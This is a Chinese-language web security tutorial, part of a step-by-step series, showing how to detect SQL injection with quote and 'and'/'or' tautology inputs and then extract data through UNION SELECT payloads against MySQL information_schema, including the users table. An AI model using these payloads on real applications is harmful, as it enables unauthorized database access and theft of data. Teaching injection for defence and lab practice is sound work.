上节了解了 SQL 注入的原理,但是我们进行 SQL 注入的时候肯定不是输入查询语句就能得到数据这么简单。
注入步骤
SQL 注入流程如下:
- 判断是否存在注入
- 存在注入后获取数据
1. 判断是否存在注入
通过输入特殊的数据触发异常可以用来判断是否存在 SQL 注入,如果下述三种情况同时存在,说明存在字符型注入
为什么返回异常就表示可能存在注入,因为如果返回了异常就表示后端执行了我们输入的 SQL 语句,没有返回异常则可能是后端将我们输入的做了字符串处理,哪怕输入 SQL 语句也看做是字符串,不会当作代码执行,这样我们就没办法进行注入。
①. 单引号法
输入: 张三',存在 SQL 注入的代码会执行如下:
SELECT score FROM Info WHERE name='张三''
可以看到相对正常语法最后多了一个引号,执行会报错,如果返回了这个报错,说明可能存在注入。
②. 逻辑联结词 and
利用逻辑语句:条件1 and 条件2,当两个条件同时满足时,SQL 语句才会正确执行,只要有一个条件为假,其结果也为假,语句则不会执行。
(1). 输入:张三' and '1'='1,执行:
SELECT score FROM Info WHERE name='张三' and '1'='1'
'1'='1' 是一个永真条件,所以这条语句应该可以正常返回 Bill Gates 的数据
(2). 输入:张三' and '1'='2,执行:
SELECT score FROM Info WHERE name='张三' and '1'='2'
'1'='2' 是个假条件,所以这条语句应该不能返回数据
③. 逻辑联结词 or
利用逻辑语句: 条件1 or 条件2,其中一个条件为真时,语句便会执行
输入: 李四' or '1'='1,执行:
SELECT score FROM Info WHERE name='李四' or '1'='1'
1=1 为真,所以不管前面的 username 等于什么,这条语句都会执行,并且返回 score 列的所有数据,相当于SELECT score FROM Info
2. 获取数据
执行上面的操作后如果存在注入,就可以在注入点进行注入,获取数据
(1). 获取当前数据库名和数据库用户名
输入:张三' union select database(), user() #
(2). 获取当前的数据库版本和操作系统
输入:张三' union select version(), @@version_compile_os #
(3). 获取数据表名
输入:张三' union select table_name,table_schema from information_schema.tables where table_schema=[数据库名]
(4). 获取表中的列名
输入:张三' union select 1,group_concat(column_name) from information_schema.columns where table_name=[表名]
(5). 获取数据
输入:张三' union select * from users #
(6). 获取字段数
输入:张三' order by 5,改变 order by 后面的数字通过是否报错可以知道这张表有几列即几个字段,数字大于已有字段数时会报错
注意说明:
-
查到的MySQL的版本⼩于4.0时,是不⽀持union select联合查询的。
-
当MySQL版本⼤于5.0时,有个默认数据库information_schema,这个数据库包含了一些表和视图,提供了访问数据库元数据的方式。
-
元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。有些时候用于表述该信息的其他术语包括“数据词典”和“系统目录”。
一些重要的数据字典表的说明:
| 表名 | 表内容 |
|---|---|
| SCHEMATA表 | 提供了关于数据库的信息。 |
| TABLES表 | 给出了关于数据库中的表的信息,TABLE 表包含两个字段 table_name 和 table_schema,分别记录 DBMS 中的存储的表名和表名所在的数据库。 |
| COLUMNS表 | 给出了表中的列信息。 |
| STATISTICS表 | 给出了关于表索引的信息。 |
| USER_PRIVILEGES表 | 给出了关于全程权限的信息。该信息源自mysql.user授权表。 |
| SCHEMA_PRIVILEGES表 | 给出了关于方案(数据库)权限的信息。该信息来自mysql.db授权表。 |
| TABLE_PRIVILEGES表 | 给出了关于表权限的信息。该信息源自mysql.tables_priv授权表。 |
| COLUMN_PRIVILEGES表 | 给出了关于列权限的信息。该信息源自mysql.columns_priv授权表。 |
| CHARACTER_SETS表 | 提供了关于可用字符集的信息。 |
| COLLATIONS表 | 提供了关于各字符集的对照信息。 |
| COLLATION_CHARACTER_SET_APPLICABILITY表 | 指明了可用于校对的字符集。 |
| TABLE_CONSTRAINTS表 | 描述了存在约束的表。 |
| KEY_COLUMN_USAGE表 | 描述了具有约束的键列。 |
| ROUTINES表 | 提供了关于存储子程序(存储程序和函数)的信息。此时,ROUTINES表不包含自定义函数(UDF)。 |
| VIEWS表 | 给出了关于数据库中的视图的信息。 |
| TRIGGERS表 | 提供了关于触发程序的信息。 |
上一节:一步一步学习Web安全 2.1 之 SQL 注入原理
下一节:一步一步学习 Web 安全 2.3 之 SQL 注入 dvwa 简单实践
网友评论